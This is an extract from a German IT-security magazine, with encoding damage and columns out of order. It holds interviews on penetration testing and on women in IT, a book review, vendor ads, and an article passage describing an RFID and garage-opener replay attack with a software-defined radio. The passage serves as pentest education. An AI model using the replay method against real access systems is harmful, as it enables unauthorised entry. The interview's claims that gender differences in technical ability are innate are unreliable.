work und Webfrontend fuumlr die grundsaumltzliche Pruumlfung eines Systems mit automatisierten Port- und Vulnera-bility-Scans und einheitlichem Reporting pro System Wir haben dabei das Ziel verfolgt nicht das Rad neu zu erfinden sondern etablierte Programme fuumlr die ei-gentlichen Pruumlfungen zu nutzen Die Ergebnisse der einzelnen Schritte werden analog zu einer manuellen Pruumlfung mit den jeweiligen Programmen automatisiert verknuumlpft Dies ermoumlglicht eine wesentliche schnellere Durchfuumlhrung bei gleicher Ergebnis-Qualitaumlt Daruumlber hinaus ist die Oberflaumlche so gehalten dass nur die not-wendigsten Optionen zur Verfuumlgung stehen
Neben der Schwachstellen-Pruumlfung ist auch eine Erreichbarkeitspruumlfung integriert um einen schnellen Uumlberblick uumlber aktive Systeme in Netzen zu erhalten
Es ist wichtig zu verstehen dass Penetrationstests ohne automatisierte Tests nicht funktionieren Die schie-re Anzahl an Schwachstellen laumlsst sich nur sinnvoll mit entsprechenden Programmen pruumlfen Die Ergebnisse sind dann die Basis fuumlr weitere manuelle Tests Dabei wird mit Know-How und Kreativitaumlt versucht weitere Luumlcken zu finden um und diese dann auszunutzen
hakin9 Wie erfolgt die Bedienung des Scanners und welche Lizenzen und Module existierenTobias Glemser Die Bedienung erfolgt vollstaumlndig uumlber eine webbasierte Oberflaumlche tajanas wird als VM-ware- oder Hardware-Appliance ausgeliefert der End-benutzer kann alle Funktionen ndash dazu gehoumlren auch Ak-tualisierungen ndash uumlber die Weboberflaumlche nutzen Jeder Nutzer erhaumllt natuumlrlich trotzdem vollstaumlndigen Root-Zu-griff auf das System Die Lizenzierung erfolgt pro In-stallation eine Limitierung auf IP-Adressen oder eine gewisse Anzahl Scans erfolgt nicht Neben dem Audit-Modul gibt es auch ein Modul fuumlr die Erreichbarkeits-pruumlfung
hakin9 Woher kommt der Name tajanasTobias Glemser tajanas steht fuumlr bdquothis ainrsquot just ano-ther network scannerrdquo ndash weil es ein wie beschrieben ein
bdquoSicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollinstrument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgreichen Produkts gesehen werdenldquoInterview mit Tobias Glemser
10201042
INTERVIEW
Nach der Durchfuumlhrung erhaumllt der Kunde einem umfas-senden auf seine Umgebung und Realitaumlt angepass-ten Ergebnisbericht der im Rahmen eines Abschluss-Workshops mit den technischen verantwortlichen besprochen wird Auf Wunsch erfolgt auch die Darstel-lung vor dem Vorstand bzw der Leitungsebene
Das Spektrum eines Penetrationstests ist sehr viel-faumlltig und laumlsst sich nur schwer darstellen Es handelt sich dabei jedoch nicht zwingend um die bdquobekanntenldquo Pruumlfungen auf Serversysteme Haumlufige Einfallstore fuumlr Angreifer sind schlecht gesicherte lokale Netzwerke Client-Systeme oder auch Multifunktionsdrucker Bei Interesse finden sich Informationen z B in der Studie Penetrationstests des BSI dem Whitepaper Penetrati-
onstests der Tele-Consulting oder auch dem Whitepa-per Projektierung der Sicherheitspruumlfung von Weban-
wendungen der OWASP
hakin9 Welche Plaumlne die IT-Sicherheit Branche betreffend haben Sie noch vorTobias Glemser Abseits von technischen Audits ver-suchen wir ganzheitliche Prozesse vor allem aber nicht nur in den IT-Abteilungen zu etablieren und dabei Ad-ministratoren die Hilfestellungen zu geben die sie da-bei benoumltigen Als Sicherheitsberater oder auch Sicher-heitsbeauftrager eines Unternehmens nimmt man meist die Rolle eines Kontrolleurs ein der darauf achtet dass Regeln eingehalten werden Hier ist ein Wandel erfor-derlich sowohl bei denen die sich bdquoSicherheitldquo auf die Fahnen schreiben als auch bei den Administratoren und Verantwortlichen fuumlr Geschaumlftsbereiche und deren Technik Sicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollin-strument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgrei-chen Produkts gesehen werden Hier muumlssen auch und vor allem Sicherheitsberater umdenken um vorrangig als Unterstuumltzer die sie sind gesehen und akzeptiert zu werden Nur so begreifen die technisch verantwort-lichen Mitarbeiter Sicherheitspruumlfungen nicht als Pruuml-fungen ihrer persoumlnlichen Kompetenz sondern als kon-krete Unterstuumltzung fuumlr die Verbesserung vorhandener Sicherheitsprozesse
Im Bereich der technischen Schwachstellen werden weiterhin Webanwendungen eine groszlige Rolle spielen Daher bin ich seit geraumer Zeit beim Open Web Appli-cation Security Project (OWASP) den meisten vermut-lich durch die OWASP Top 10 bekannt ehrenamtlich taumltig und seit diesem Jahr im Board der deutschen Sek-tion Beim OWASP Stammtisch Stuttgart (und Stamm-tischen in anderen Staumldten) tauschen sich hier auch Menschen rund um das Thema zwanglos aus Wer Lust hat vorbeizukommen kann sich auf der deutschen OWASP Webseite informieren
Wir bedanken uns fuumlr das Gespraumlch
Framework darstellt und nicht den n-ten Port- oder Vul-nerability-Scanner Wenn wir Bugs in den verwendeten Programmen feststellen oder Ideen fuumlr Erweiterungen haben geben wir diese direkt in die Community zuruumlck
hakin9 Wer sind Benutzer von tajanasTobias Glemser Zum einen natuumlrlich wir selbst Zum anderen setzten IT-Sicherheitsbeauftragte und IT-Revi-soren das Tool fuumlr regelmaumlszligige Sicherheitspruumlfungen ihrer Netze ein
hakin9 Fuumlr welche Faumllle reichen Penetrationstests nicht ausTobias Glemser Das haumlngt von der Zieldefinition des Kunden ab und was man unter einem Penetrationstest versteht Bei Tele-Consulting sind alle Mitarbeiter nicht nur in technische Audits wie Penetrationstests eingebun-den sondern auch in prozessorientierte Beratungen und Audits wie z B ISO 27001 oder BSI IT-Grundschutz Dies ermoumlglicht es uns in technischen Audits nicht nur die technischen Luumlcken aufzuzeigen sondern auch auf fehlende oder mangelhafte Prozesse hinzuweisen und konkrete Vorschlaumlge zur Verbesserung zu geben
hakin9 Koumlnnen Sie uns ein konkretes Beispiel nennenTobias Glemser Nehmen wir an dass aus Wirtschaft-lichkeitsgruumlnden nicht alle Server in einem Netz in ein technisches Audit einbezogen werden sondern nur eine definierte Anzahl Stellt man hier Schwachstellen fest so genuumlgt es nicht die erkannten Schwachstellen oder gar Luumlcken zu schlieszligen sondern man muss sich fra-gen wie es zu den Schwachstellen kommen konnte In den seltensten Faumlllen haben hier Administratoren indi-viduelle Fehler gemacht vielmehr scheinen offensicht-lich die Vorgaben zur Serverkonfiguration bzw Haumlrtung nicht ausreichend zu sein bzw diese in ein Information Security Management System (ISMS) integriert zu sein Darauf weisen wir nachdruumlcklich in unseren Ergebnis-berichten hin um eine Gesamtverbesserung zu erzie-len und unterstuumltzen bei Bedarf auch bei der Umset-zung der organisatorischen Anteile
Geht man diesen Schritt nicht werden erfahrungs-gemaumlszlig nur die Systeme veraumlndert bei denen im Test Schwachstellen erkannt wurden Der Verbesserung der Gesamtsicherheit hilft dies dann allerdings nicht
hakin9 Wie sieht eine Sicherheitsuumlberpruumlfung mithilfe des Penetrationstests ausTobias Glemser Zunaumlchst bedarf es einer klaren Ziel-vorstellung Entweder haben Kunden diese bereits oder sie wird im Rahmen eines Workshops gemeinsam erarbeitet Dabei ist es meist sinnvoll mehrstufig vorzu-gehen und die Themen in verschiedenen Arbeitspake-ten abzuarbeiten Im Rahmen eines Kick-Offs werden die Beteiligten informiert und in den Ablauf integriert
10201044
INTERVIEW
hakin9 Lassen Sie uns bitte ein wenig uumlber sich selbst wissen wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie in der IT-Branche taumltig sindUlrike Peter Ich bin PR-Spezialistin und Journalis-tin durch und durch Die Liebe zum Schreiben ent-deckte ich fruumlh Nach ersten Gehversuchen als freie Mitarbeiterin bei einer Tageszeitung absolvierte ich vor zehn Jahren ein Volontariat in einer PR-Agentur mit parallelem Fernstudium bdquoJournalismusldquo Die ers-ten Tage in der Agentur waren wie ein Kopfsprung ins kalte Wasser Denn obwohl ich das journalistische Ruumlstzeug besaszlig wusste ich anfangs nicht mal wo sich die Escape-Taste an meinem PC befand hatte aber die Aufgabe ohne spezielles Hintergrundwissen uumlber komplexe Technologien detaillierte Berichte zu formulieren Da dies den Ehrgeiz in mir weckte ar-beitete ich mich schnell in die Materie ein und stell-te fest dass Public Relations in Verbindung mit der Erstellung technologischer Texte mein Steckenpferd ist Heute bin ich Geschaumlftsfuumlhrerin meiner eigenen PR-Agentur und obwohl ich mittlerweile auch in wei-teren Branchen und Aufgabengebieten zuhause bin ist die Freude daran bdquotrockeneldquo und komplexe Inhalte lebendig werden zu lassen noch genauso vorhanden wie am ersten Tag
hakin9 Viele glauben dass Computer Maumlnnersache sind Was halten Sie davonUlrike Peter Die landlaumlufige Meinung existiert nach wie vor dass Maumlnner ein besseres technologisches Verstaumlndnis mitbringen Dies resultiert nicht selten aus Vorurteilen laumlsst sich aber auch nicht komplett abstreiten Denn nicht nur Erfahrungswerte sondern auch Belege aus der Hirnforschung zeigen dass Frauen besser mit Sprache umgehen koumlnnen und Maumlnner sich in Naturwissenschaften wohler fuumlhlen Es liegt wohl ein Stuumlck weit in der Natur der Sache
Aber wie heiszligt es so schoumln bdquoAusnahmen bestaumltigen die Regelldquo Und der Trend zeigt beispielsweise dass Frauen zunehmend technische Studiengaumlnge bele-gen
hakin9 Heutzutage sind wir uumlberall von Computern umgeben In der IT-Branche herrscht trotzdem ein Frauenmangel Woran liegt dies Ihrer Meinung nachUlrike Peter Noch lockt es wesentlich mehr Maumlnner in technische Berufe als Frauen Ich denke das Verhaumlltnis wird auch in Zukunft so bleiben ndash auch wenn sich die klassische Rollenverteilung verschiebt und die bdquoGren-
bdquoErfolgreiche Frauen in der IT-Branche - ein Erfahrungsberichtldquo
Interview mit Ulrike Peter
Interview mit Ulrike Peter
hakin9orgde 45
Vorgesetzten und zum anderen nach den Faumlhigkeiten der Frau Jeder Mitarbeiter der neu eingestellt wird steht vor der Aufgabe sich zu beweisen ndash und sollte die Moumlglichkeit dazu erhalten Jedoch werden Frau-en in typischen Maumlnnerberufen oft kritischer beaumlugt und stehen laumlnger auf dem Pruumlfstand Dies passiert teils unbewusst Auch beweisen Studien immer wie-der dass maumlnnliche Arbeitnehmer im gleichen Job mehr verdienen als weibliche Hier macht die Gesell-schaft aber eine Entwicklung durch und dies reguliert sich sicherlich zumindest ein Stuumlck weit im Laufe der naumlchsten Jahre
hakin9 Was macht Ihnen am meisten Spaszlig bei der Arbeit in der IT-BrancheUlrike Peter Bevor ich mich selbstaumlndig machte war ich bereits in einem anderen Unternehmen in der Ge-schaumlftsleitung taumltig ndash jedoch konnte ich den Stift zum Schreiben nie aus der Hand legen Es reizt mich im-mer wieder neue technologische Themen zu erkunden und dabei nicht nur an der Oberflaumlche zu kratzen son-dern Detailtiefe zu erlangen um fundiert und lesens-wert uumlber ein Thema berichten zu koumlnnen Im Laufe der Jahre habe ich eine starke Affinitaumlt zur IT-Security entwickelt Ich finde es spannend uumlber Sicherheits-luumlcken Verschluumlsselungstechniken und vieles weite-re zu schreiben Daruumlber hinaus macht es mir groszligen Spaszlig IT-Unternehmen durch die richtige PR-Strategie nach vorn zu bringen und entsprechende Maszlignahmen in die Tat umsetzen Beim Kennenlernen eines poten-ziellen Neukunden im ersten Moment manchmal hin-sichtlich der technischen Fachkompetenz unterschaumltzt zu werden und dann schnell durch Know-how zu uumlber-zeugen bestaumltigt mich immer wieder in dem was ich tue
hakin9 Was sollte unternommen werden um die Ressentiments von Frauen gegenuumlber IT-Jobs abzubauenUlrike Peter Ich glaube dem kann man bzw Frau nur entgegenwirken indem sie den Mut hat ihre Interessen zu verfolgen und sie unter Beweis zu stellen Aus Er-fahrung wenn jemand seine Faumlhigkeiten zeigt und en-gagiert an eine Sache herangeht ruumlckt das Geschlecht automatisch in den Hintergrund
Wir bedanken uns fuumlr das Gespraumlch
zenldquo in beide Richtungen mehr und mehr verschwim-men Denn auch Maumlnner finden wir heute in Berufen die vor Jahren ausschlieszliglich Frauen zugeordnet wur-den Und wir sind zwar von elektronischen Geraumlten wie PCs Smartphones etc umgeben und diese werden auch rege von beiden Geschlechtern genutzt ndash aber ei-nen technischen Job zu ergreifen ist ein anderes paar Schuhe Hierzu gehoumlrt ein besonderes Faible Die Be-weggruumlnde weshalb in diesem Segment Frauenman-gel herrscht sind meiner Meinung nach Ihnen fehlt manchmal der Mut sie erhalten nicht immer die glei-chen Chancen oder ndash und das wird der Hauptgrund sein ndash es liegen schlichtweg die Interessen in anderen Be-reichen
hakin9 Woraus resultieren die Vorurteile gegen die Frauen die sich mit Computern beschaumlftigenUlrike Peter Die IT ist (und bleibt es sicher auch) eine Maumlnnerdomaumlne ndash Frauen in der IT-Branche sind Para-diesvoumlgel Wie in allen Berufen in denen seit jeher ein Geschlecht etabliert ist sich Prozesse eingeschliffen und bewaumlhrt haben ist es erst einmal fremd und ge-woumlhnungsbeduumlrftig wenn sie sich veraumlndern So liegen die Vorurteile zum einen daran dass es nicht uumlblich ist wenn Frauen in diesen Berufen arbeiten und Maumlnnern die bdquoTechnikldquo zugeordnet wird ndash zum anderen resultie-ren sie daraus dass die unterschiedlichen Faumlhigkeiten und Interessen der Geschlechter einfach naturgege-ben sind So wie kleine Jungen mit Autos spielen und Maumldchen mit Puppen stecken auch spaumlter gewisse Verhaltensweisen und Interessen in uns die bereits in der Kindheit gepraumlgt werden Greift das weibliche Ge-schlecht im Berufsleben ploumltzlich zum bdquoAutoldquo so ist dies ungewoumlhnlich und wird erst einmal hinterfragt
hakin9 Wie sieht die Situation von Frauen in der IT-Branche aus Ist es leicht als begabte IT-Expertin einen Job in einem Unternehmen zu bekommenUlrike Peter Frauen in der IT-Branche sind haumlufig in Marketingabteilungen zu finden ndash aber zum Beispiel auch bei der schreibenden Zunft in Fachverlagen In diesen Jobs herrscht in meinen Augen Chancengleich-heit Als IT-Expertin in einem technischen Beruf wie Ad-ministrator Entwickler oder Aumlhnliches sieht es dagegen anders aus In diesem Segment haben es weibliche Fachkraumlfte meiner Ansicht nach schwerer Die Huumlrde zum Bewerbungsgespraumlch eingeladen zu werden ist houmlher Bekommt sie die Chance dazu wird vielleicht et-was genauer hingeschaut aber letztlich zaumlhlt die Kom-petenz die unterm Strich den entscheidenden Aus-schlag geben wird
hakin9 Wie werden Frauen von Maumlnnern als ihre Mitarbeiter wahrgenommenUlrike Peter Dies laumlsst sich nicht pauschalisieren und richtet sich zum einen nach der Einstellung des
10201046
REZENSIONEN
Das Buch SAP for DFPS Implementierung und Customizing basiert auf mehr als 20 Jahren Er-fahrung die die Autoren insgesamt bei der Ent-
wicklung Implementierung aber auch Schulung der Loumlsung sammeln konnten
Die uumlber 650 Seiten vollgepacktes Wissen sollten sie nicht abschrecken dieses Buch in die Hand zu nehmen Es ist sehr gut und fluumlssig geschrieben Man schafft es sollten sie ein schneller LeserIn sein in zwei Tagen
Sie benoumltigen keine tiefgreifenden SAP-Kenntnisse zum Verstaumlndnis daher ist es fuumlr Entscheider genauso geeignet wie fuumlr Projektleiter Architekten funktionale Mitarbeiter Basismitarbeiter oder externe Berater
Komplexe Zusammenhaumlnge werden sehr schoumln und bildhaft beschrieben damit auch fuumlr den SAP-Laien das Vorgehen verstaumlndlich beschrieben wird Erwaumlh-nenswert finde ich in diesem Zusammenhang Rubiks Zauberwuumlrfel
Das Buch ist sehr strukturiert aufgebaut und umfasst unverzichtbare Grundlagen in den Teilen I-IIIFuumlr Experten wird es dann in Teil IV richtig spannend und interessant
Die von SAP entwickelte fast eierlegende Wollmilch-sau erfordert ein umfangreiches Nachschlagewerk zur Implementierung Den Autoren ist dies hiermit gelun-gen
Ihnen ist es auszligerdem gelungen aufzuzeigen wie komplexe bdquoUnternehmensstrukturenldquo bewaumlltigt und Kos-ten reduziert und kontrolliert werden koumlnnen
Das Beispielprojekt bdquoTsunamildquo verdeutlicht dabei an einem nicht so komplexen Projekt die Anforderungen Beleuchtet wird zB wie militaumlrische Kernprozesse wie etwa die Logistik substanzielle Einsparungen von ca 30 erzielen koumlnnten als auch die Unterstuumltzung von Einsaumltzen verbessert werden koumlnnten (Beschleunigung der Verlegung um bis zu 50 -70)
Des Weiteren wird die Interoperabilitaumlt sehr schoumln he-raus gestellt und die integrativen Aspekte stets im Blick behalten
Hervorheben sollte man die organisatorische Flexi-bilitaumlt und Logistik wie das Logistic Assessment Pro-zessmanagement Qualification Management inkl der Uumlbernahme von Trainingsdaten das Managementkon-zept BSC (Balanced Scorcard) die Einsatzmoumlglichkei-ten von mobilen Anwendungen fuumlr Schutzaufgaben SOA und NCW bzw NetFuumlOp mit DFPS
Der Mehrwert wird zB am Meldewesen der NC3A durch Automatisierung von weiten Teilen schoumln heraus gearbeitet
Die ausfuumlhrlichen bebilderten Beispiele stellen eine gelungene Verbindung zwischen Theorie und Praxis bzw Anwendung dar In der SAP-typischen Struktur wurden die neuen und bereits erwaumlhnten Funktionen sinnvoll und gekonnt integriert
Des Weiteren findet sich fuumlr die richtige IT-Architektur ein schoumln gefuumlllter Werkzeugkasten mit den dazuge-houmlrigen Dorsquos and Dontrsquos Natuumlrlich darf auch das best practices nicht fehlen sowie der Ausblick auf zukuumlnftige Entwicklungen
Egal ob sie sich fuumlr eine Neuintegration oder eine Co-re2Defense Loumlsung entscheiden
die Kapitel zu den Themen
moumlchte ich ihnen unbedingt ans Herz legen
FAZITDieses Buch sollte keinem Entscheider und IT-Verant-wortlichen vorenthalten werden
Praumldikat besonders empfehlenswert
Autor Nicole Huck
SAP for DFPSImplementierung und CustomizingGalileo Press Bonn 20101 Auflage 2010AutorenBernhard EscherichHeinrich PfriemerWolfgang Ullwer
Datenschutz ist EU-weit gesetzliche Anforde-
rung Wir sorgen fuumlr die Erfuumlllung rechtlicher
Vorschriften und kuumlmmern uns um ein ange-
messenes Datenschutzniveau in Ihrem Unter-
nehmen auch international
wwwblossey-partnerde
Recommended Sites
Securitymanagerde ist eine Produktion des
Online-Verlag FEiG amp PARTNER Seit dem
Start hat sich Securitymanagerde zu einem
fuumlhrenden Online-Informationsportal in
Deutschland entwickelt und versteht sich als
unabhaumlngiger Informationsdienstleister der
IT- und Information-Security-Branche
wwwsecuritymanagerde
Pericom base camp IT-Security Unser Ziel ist
es unsere Kunden vor moumlglichen Gefahren
fuumlr Ihre IT-Infrastruktur bestmoumlglich zu schuumlt-
zen Neben der Analyse von Risikopotentia-
len durch Security Audits bieten wir durch
die Implementierung von Security-Loumlsungen
Schutz vor konkreten Gefahren
wwwpericomat
Happy-Security ist ein neues Portal mit Secu-
rity-Challanges IT-Quiz Web-Bibliothek Multi-
media-Center amp vielen weiteren Features
wwwhappy-securityde
CloudSafe stellt seinen Nutzern eine Plattform
zur kryptographisch sicheren Ablage und Verwal-
tung von sensiblen Daten zur Verfuumlgung Nutzer
koumlnnen auf CloudSafe beliebig viele Dokumente
in virtuellen Safes ablegen Es koumlnnen weite-
ren Personen individuelle Zugriffsrechte auf die
Safes eingeraumlumt und somit ein sicherer Daten-
austausch ermoumlglicht werden
wwwcloudsafecom
AV-Comparatives geht hervor aus dem Inns-
brucker Kompetenzzentrum und gilt als eines
der bekanntesten unabhaumlngigen Testhaumluser
fuumlr Antiviren-Software
wwwav-comparativesorg
Die Seed Forensics GmbH bietet fuumlr Strafver-
folgungsbehoumlrden professionelle Unterstuumltzung
in den Bereichen der Datensicherstellung und
Datentraumlgerauswertung Selbstverstaumlndlich
entsprechen unsere Mitarbeiter unser tech-
nisches Equipment und auch unsere Raumlumli-
chkeiten den notwendigen Anforderungen
wwwseed-forensicsde
Wollen Sie Ihre Seite empfehlen kontaktieren Sie bitte dehakin9org
Die Netzwerktechnik steht auf wwweasy-ne-
tworkde im Mittelpunkt Artikel Tutorials und
ein Forum bieten genuumlgen Stoff fuumlr kommende
wwweasy-networkde
Computerfreaks houmlher schlagen laumlsst Geek
Wear mit intelligenten Spruumlchen eine riesige
Auswahl Gadgets und natuumlrlich auch viele
Hacker Tools
wwwgetDigitalde
Recommended Companies
SEC ConsultSEC Consult ist der fuumlhrende Berater
fuumlr Information Security Consulting in
Zentraleuropa Die vollstaumlndige Unab-
haumlngigkeit von SW- und HW-Herstellern
macht uns zum echten Advisor unserer
Kunden Unsere Dienstleistungen umfa-
ssen externeinterne Sicherheitsaudits
(Web-) Applikationssicherheit (ONR 17-
700) Sicherheitsmanagement-Prozesse
(ISO 27001) etc
wwwsec-consultcom
SEC Consult
Tele-Consulting GmbH
Sicherheit hakin9 und crsquot Autoren jah-
relange Erfahrung bei der Durchfuumlhrung
von Penetrationstests und Security-Au-
dits eigener Security Scanner bdquotajanasrdquo
Sicherheitskonzepte Risikoanalysen
ISO 27001-Auditoren VoIP-Planung
und -Security
wwwtele-consultingcom
B1 SystemsDie B1 Systems ist international taumltig
in den Bereichen LinuxOpen Source
B1
Systems spezialisiert sich in den Be-
reichen Virtualisierung und Cluster
infob1-systemsde
wwwb1-systemsde
Blossey amp Partner
Consulting DatenschutzbuumlroDatenschutz ist EU-weit gesetzliche An-
forderung Wir sorgen fuumlr die Erfuumlllung
rechtlicher Vorschriften und kuumlmmern
uns um ein angemessenes Daten-
schutzniveau in Ihrem Unternehmen
auch international Wir erledigen alle er-
forderlichen Aufgaben die Faumlden behal-
ten Sie in der Hand Nutzen Sie unser
Erstberatungsgespraumlch
wwwblossey-partnerde
secXtreme GmbHschuumltzt Ihre Web-Anwendungen bis
auf Applikationsebene Dazu gehoumlrt
sowohl die Pruumlfung von Applikationen
(Pentests und Code-Reviews) als auch
Beratungsleistungen fuumlr Sicherheit im
Entwicklungsprozess und Schutzlouml-
sungen (Web Application Firewalls) bei
Mittelstand
wwwsec-Xtremecom
Mabunta
spezialisierter und kompetenter Partner
heitsfragen in allen Unternehmens-
bereichen verbinden Wachstum mit
sicherer Kommunikation
Alles in allem- mabunta bdquoone-face-to-
the-customerldquo Ihr Spezialist in Fragen
wwwmabuntade
Recommended Companies
SecureNet GmbH MuumlnchenAls Softwarehaus und Web Application
Security Spezialist bieten wir Expertise
rund um die Sicherheit von Webanwen-
dungen Anwendungs-Pentests Sour-
delines Beratung rund um den Software
Firewalls Application Scanner Fortify
wwwsecurenetde
underground_8
secure computing gmbhWir entwickeln und vertreiben securi-
und Antispam Unsere Loumlsungen sind
hardwarebasiert und werden uumlber Dis-
tributoren Reseller und Systemintegra-
toren implementiert und vertrieben
wwwunderground8com
OPTIMAbit GmbHWir sind Spezialisten fuumlr Entwicklung
und Mobile Applikationen gegen Angriffe
externer und interner Art Unsere Dien-
ste umfassen Audits Code Reviews
Penetrationstest sowie die Erstellung
von Policies Zusaumltzlich bieten wir Semi-
wwwoptimabitcom
m-privacy GmbH
einfach zu bedienen
So praumlsentieren sich die von m-privacy
tesiegel Es bietet als erstes System
weltweit einen kompletten Schutz vor
Online-Spionage Online-Razzien und
gezielten Angriffen
wwwm-privacyde
NESECNESEC ist Ihr Spezialist fuumlr Penetra-
tionstests Sicherheitsanalysen und
cherheitspruumlfungen Ihrer Netzwerke
und Webapplikationen sowie bei Sour-
ce Code Audits Bei Bedarf optimieren
wir Ihre Policy sensibilisieren Ihre
nehmen nach ISO 27001
wwwnesecde
Seed Forensics GmbH
fuumlr Strafverfolgungsbehoumlrden profe-
ssionelle Unterstuumltzung in den
Bereichen der Datensicherstellung
und Datentraumlgerauswertung Selbst-
verstaumlndlich entsprechen unsere
Mitarbeiter unser technisches Equip-
0ment und auch unsere Raumlumlichkeiten
den notwendigen Anforderungen
wwwseed-forensicsde
Protea Networks
Loumlsungen Verschluumlsselung Firewall
ring etc Wir bieten umfassende Bera-
tung Vertrieb von Security-Hard- und
Software Installation und umfangreiche
nings) Protea setzt auf Loumlsungen der
dafuumlr direkten inhouse-Support bereit
wwwproteanetworksde
secadmsecadm ist durchtrainierter Spezialist fuumlr
Airbags ABS und Sicherheitsgurte in der
Mannjahren Erfahrung beraten entwi-
fuumlr Kunden weltweit Der Fokus liegt da-
und Security-Management Risiko-Analy-
se die Sicherheitsberatung Auditing Se-
curity-Leitfaumlden Software-Entwicklung
wwwsecadmde
Penetration Testing im Jahre 2010
hakin9orgde 21
ist heute sowohl bei Unternehmen als auch in Pri-vathaumlusern (Autoschluumlssel Funk-Garagentoroumlffner) sehr verbreitet und wegen des Komforts beliebt Im Wesentlichen besteht das System aus zwei Kompo-nenten einem RFID Lesegeraumlt und den sogenannten Tags Mit den Tags koumlnnen sich die Zugangsberech-tigten Personen am Lesegeraumlt identifizieren Unab-haumlngig davon ob das Tag aktiv (mit einer eigenen Energieversorgung) oder passiv (die notwendige Energie liefert das Lesegeraumlt) ist wird der Identifi-kationsvorgang vom Tag eingeleitet In den einfach-sten Faumlllen sendet das Tag unverschluumlsselt die eige-ne Seriennummer oder einen vorher eingespeicher-ten Code das Lesegeraumlt empfaumlngt den Code und uumlberpruumlft ob die Seriennummer oder der Code zu-gangsberechtigt ist In den wenigsten Faumlllen erfolgt eine zusaumltzliche Kryptographische Authentifizierung des Tags die aber wegen der geringen Rechenka-pazitaumlt und Energieversorgung sehr einfach ausfaumlllt
Wie kann man solche Systeme uumlberlisten Das Zauberwort dazu lautet bdquoSoftware Defined Ra-dioldquo (SDR) Mit einem SDR Tranceiver ist man in der Lage die Kommunikation zwischen dem Tag und dem Lesegeraumlt aufzuzeichnen und auf einem Rech-ner zu analysieren Anschlieszligend sendet man die aufgezeichneten und eventuell bearbeiteten Daten an das Lesegeraumlt
Wie laumluft ein solcher Angriff ab Zunaumlchst einmal muss man herausfinden auf wel-cher Frequenz die Kommunikation zwischen dem Le-segeraumlt und den Tags erfolgt Dazu kann man uumlber den Herstellernamen des Lesegeraumltes und seinem Produkt-Portfolio gehen oder einfach verschiedene Tags ausprobieren Wenn ein Tag mit dem einge-setzten Lesegeraumlt nicht kompatibel ist erfolgt keine Reaktion Wird dem Tag der Zugang verweigert so zeigt das Lesegeraumlt dies in der Regel an Dann wird ein SRD Tranceiver benoumltigt der auf der benoumltigten Frequenz arbeitet Dazu verwende ich den USRPUSRP2 Tranceiver mit einem passenden Daughter-board und einer Richtantenne (700$1400$ + 275$ + 100$) Der Vorteil dieses Universalsystems liegt daran dass man mit verschiedenen Daughterboard unterschiedliche Frequenzen abdecken kann Die Richtantenne richtet man dann etwas seitlich auf das Lesegeraumlt aus und faumlngt mit der Aufzeichnung der Daten in dem Frequenzbereich an Bei Long Range Tags (das Tag kann mehrere Meter vom Lesegeraumlt entfernt sein) reicht bei Unverschluumlsselten Systemen - wegen der houmlheren Sendestaumlrke - die Aufzeichnung einer Kommunikation aus Passive Tags wie RFID Karten senden ein viel schwaumlcheres Signal deshalb sind die Aufzeichnungen oft gestoumlrt In der Regel be-noumltigt man fuumlnf bis zehn Aufzeichnungen um ein Mus-
Abbildung 8 Eine Uumlberwachungskamera hat eine Veraumlnderung im Bild detektiert Der veraumlnderte Bildausschnitt wird in einem Rahmen angezeigt
Abbildung 7 Das Lesegeraumlt reagiert auf eine Mifare-Classic Karte und lehnt den Zugang ab
10201022
PRAXIS
ter zu finden Der Anfang der Uumlbertragung ist immer gleich in der Mitte gibt es einen variablen Bereich und das Ende ist bei allen Aufzeichnungen ebenfalls gleich Damit ein Lesegeraumlt nun dem virtuellen Tag den Zugang gewaumlhrt saumlubert man zunaumlchst einmal die Aufzeichnungen mit einigen Filtern GNU-Radio bietet hierfuumlr zahlreiche Moumlglichkeiten Dann stellt man sich aus mehreren Aufzeichnungen ca drei moumlglichst ideale (hier braucht man etwas Erfahrung ein gutes Auge und etwas Fingerspitzengefuumlhl) Kom-munikationen zusammen und sendet diese an das Lesegeraumlt Mindestens eine dieser Aufzeichnungen wird dann das Lesegeraumlt akzeptieren und dem An-greifer den Zugang gewaumlhren
Aus der Praxis kann ich sagen dass etwa 90 al-ler RFID-Karten-Systeme sich nur mit der Serien-nummer des Tags zufrieden geben Aumlltere Garagen-toroumlffner arbeiten mit einem statischen Code Neuere Garagentoroumlffner und einige Autohersteller nutzen ei-nen Rolling Code um den Nutzer zu identifizieren Im Maumlrz 2008 wurde auch dieses System von Forschern der Ruhr-Universitaumlt Bochum geknackt Zwei aufge-zeichnete Kommunikationen genuumlgen bereits fuumlr ei-ne Seitenkanalattacke Ebenfalls wurde im Jahr 2008 die Verschluumlsselung des Mifare-Systems per Rever-se Engineering geknackt Solche Verschluumlsslungen verlangsamen nur den Angriff und machen ihn teurer
Gibt es auch sichere RFID-Systeme Die gibt es durchaus Hier verwendet man eine asymmetrische Verschluumlsselung Fuumlr jedes zugangs-
berechtigte Tag wird ein privater und ein oumlffentlicher Schluumlssel erzeugt Der private Schluumlssel wird in einer Datenbank gespeichert auf die das Lesegeraumlt zu-greifen kann Der oumlffentliche Schluumlssel wird auf dem Tag gespeichert Die Identifizierung erfolgt dann in mehreren Schritten Wie oben bereits beschrieben faumlngt das Tag mit der Identifikation an indem es dem Lesegeraumlt seine Seriennummer mitteilt Das Lesege-raumlt generiert daraufhin eine Zufallszahl und sendet diese mit der Seriennummer des Tags wieder zuruumlck (Da die Kommunikation uumlber Funk erfolgt kann es sein dass zur gleichen Zeit mehrere RFID Tags aktiv sind Deshalb muss man waumlhrend der Kommunikati-on stets angeben fuumlr welchen Empfaumlnger eine Nach-richt bestimmt ist) Das Tag empfaumlngt die Nachricht verschluumlsselt diese mit dem oumlffentlichen Schluumlssel und sendet sie an das Lesegeraumlt zuruumlck Kann das Lesegeraumlt die empfangene Nachricht mit dem priva-ten Schluumlssel des Tags entschluumlsseln und stimmt die Nachricht mit der Zufallszahl uumlberein wird der Zu-gang gewaumlhrt
